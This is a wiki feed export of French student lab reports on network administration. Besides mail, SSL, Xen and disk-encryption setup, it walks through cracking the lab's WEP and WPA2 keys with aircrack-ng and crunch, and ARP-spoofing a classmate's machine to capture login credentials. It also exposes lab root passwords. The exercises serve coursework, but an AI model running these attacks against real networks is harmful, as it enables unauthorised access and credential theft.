Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Gandi-t%C3%A9l%C3%A9chargement_clefetcertifica_mirage.png&amp;diff=53943</id>
		<title>Fichier:Gandi-téléchargement clefetcertifica mirage.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Gandi-t%C3%A9l%C3%A9chargement_clefetcertifica_mirage.png&amp;diff=53943"/>
				<updated>2020-11-20T09:48:23Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53942</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53942"/>
				<updated>2020-11-20T09:42:54Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Envoie du SSL Certification Gandi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
